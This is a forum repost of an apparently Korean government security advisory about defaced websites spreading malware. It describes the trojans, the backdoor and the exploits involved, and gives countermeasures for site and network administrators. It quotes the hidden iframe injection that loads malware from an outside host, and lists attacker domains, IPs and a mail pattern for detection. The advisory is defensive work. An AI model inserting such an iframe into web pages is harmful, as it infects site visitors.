<국가사이버안전센터>홈페이지 변조 후 은닉된 악성프로그램 유포 주의 > 그누4 팁자료실

그누보드5
그누보드6
가이드
포럼
  • Q&A
  • 파이써니스타
  • 이슈
  • 버그신고
  • 사용후기
    • 자료실
  • 다운로드
  • 팁자료실
  • 스킨
  • 테마
  • 플러그인
    • Q & A
    궁금한 게 있으신가요? 지금 질문해보세요!
    솔루션
    프로그래밍
    서버
    사이트운영
    컨텐츠몰
    나의 재능을 팔아보세요!
    부가서비스
    프로모션! 신용카드 결제수수료 2.9%
    제작의뢰
    커뮤니티
    커뮤니티
    소모임
    스터디
    강좌
    기타

    그누4 팁자료실

    그누보드4와 관련된 팁을 여러분들과 함께 공유하세요.
    나누면 즐거움이 커집니다.

    <국가사이버안전센터>홈페이지 변조 후 은닉된 악성프로그램 유포 주의 정보

    <국가사이버안전센터>홈페이지 변조 후 은닉된 악성프로그램 유포 주의

    본문

    MBC ESPN, MSN Korea 등 최근 웹페이지 변조 후 특정코드를 숨겨 놓아 악성프로그램 유포에 악용하는 사고가 증가하고 있으므로 주의하시기 바랍니다.

    각급기관은 홈페이지 서버의 보안패치를 확인하고 특히, 홈페이지내에 iframe 태그를 이용한 수상한 코드삽입 여부를 확인 하는 등 주의하시기 바랍니다.

    ※ 위 내용은 제 메일로 온 내용을 이곳 홈페이지 관리자분들에게 참고할 수 있게 복사 붙이기 한것입니다.... 참고가 되었으면 하는 바램입니다.

    ■ 주요특징

     

    o 해킹에 의해 변조된 웹페이지를 방문시 http://hangamegogo.17mo.net으로부터 악성코드를 다운로드

    o 다운로드 되는 악성코드는 MS취약점을 이용하여 백도어 및 계정유출 프로그램을 자동설치하고 실행함

    o 감염에 이용되는 파일에 대한 정보는 다음과 같음

    악성코드 종류

    주요 특징

    HangHack Troijan

    o 감염되면 syshlp.dll 파일이 생성되고,   iexplore.exe에 인젝션되어
    실행

    o 온라인게임 계정 및 패스워드를 유출   (smtp.tom.com:25 연결 후 메일전송)

    GrayBird.bk Backdoor

    o 리버스커넥션하는 백도어 프로그램

    o 감염되면 svchost.exe와 램덤한파일명.dat(ex. yiykbs.dat) 두개의 파일이 생성되고, 랜덤한파일명.dat는 다른 프로세스에 인젝션되어 실행됨

    o vip.huigezi.com(61.152.93.13)로부터 특정파일 다운로드하고, 222.181.170.35:21 또는 222.181.169.159:21로 리버스커넥션 요청함

    o 은폐형으로 동작하여 프로세스 목록이나 파일보기에서 확인 불가능 (c:\windows\dhcp 폴더 내에 백도어 파일이 존재하지만, 보이지는 않음)

    o GrayBird Client를 이용하여 시스템 정보 및 파일유출 가능함

    phel.q Exploit

    o MS04-013, MS05-001 취약점을 이용하는 Exploit 코드

    o Psyme Trojan Downloader 파일을 다운로드 후 실행시킴

    phel.c Exploit

    o MS05-001 취약점 Exploit 코드

    o HangHack Troijan 파일 다운로드 후 자동설치

    Psyme Trojan Downloader

    o MS05-001 취약점 Exploit 코드

    o GrayBird.bk Backdoor를 시스템에 자동설치하기 위한 도움말 파일

     * 변조된 웹페이지를 방문하여 악성코드가 삽입된 페이지를 열람하여도, 최신보안패치(MS04-013, MS05-001)가 된 경우에는 감염되지 않음. 일부 백신에서는 악성코드가 삽입된 페이지 (HTML 파일) 자체도 탐지하므로, 변조된 웹페이지를 방문시에 바이러스탐지 알람이 나타나기도 하지만 실제로 감염되는 것은 아님.

       즉, 감염확인은 HangHack Trojan의 경우 c:\windows\system32\syshlp.dll파일, GrayBird.bk의 경우는  c:\windows\dhcp 폴더가 존재여부로 판단


    ■ 대응책

     

    악코드 종류

    주요 특징

    홈페이지 관리자
    및 운영자

    o 홈페이지에 다음과 같은 코드의 삽입여부를  확인
    (특히, 메인페이지의 경우 집중 확인)

    <iframe src=http://hangamegogo.17mo.net/swh width=0 height=0></iframe>

    * URL 정보는 변경될 수 있으므로 불필요한 iframe, object 태그 등을 확인

    o 홈페이지 서버에 최신 보안패치가 적용되었는지 확인

    o 외부로부터 웹서버에 대한 해킹시도를 중점 모니터링 수행

    네트워크 관리자

    o 다음의 도메인 또는 IP 접속을 차단

    hangamegogo.17mo.net
    vip.huigezi.com (61.152.93.13)
    222.181.169.159, 222.181.170.35 (21/tcp)
    smtp.tom.com (25/tcp)

    o 다음의 도메인 또는 IP에 접속시도하는 PC를 찾아 조치

    vip.huigezi.com (61.152.93.13  8000~8005/tcp)
    222.181.169.159, 222.181.170.35 (21/tcp)
    smtp.tom.com (25/tcp)

    o 다음형식의 메일 전송을 탐지

    메일서버주소 : smtp.tom.com
    보내는 주소: *** 개인정보보호를 위한 이메일주소 노출방지 ***
    받는 주소: *** 개인정보보호를 위한 이메일주소 노출방지 ***
    제목 : give you
    내용: <hangme>: 계정, 패스워드 <hangame>

    개인사용자

     o  각 백신제품을 이용하여 자동업데이트 및 수동업데이트 실시

     o  최신 윈도우즈 보안패치 실시

     


    ■ 참고사이트

      o 안철수연구소

    Win-Trojan/HangHack.26624
    http://info.ahnlab.com/smart2u/virus_detail_2419.html

    Dropper/GrayBird.385024
    http://info.ahnlab.com/smart2u/virus_detail_2417.html
     
      o 잉카인터넷 Trojan/W32.HangHack.26624
    http://www.nprotect.com/v5/contents/index.php?mode=virus_view&no=322
     
      o 지오트 Trojan-PSW.Win32.Lineage.hc
    http://geot.com/virus/virus_info_view.php?db=virus&no=647&page=
     
         
    추천
    0

    댓글 6개

    전체 95 |RSS
    그누4 팁자료실 내용 검색

    회원로그인

    (주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
    사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
    © SIRSOFT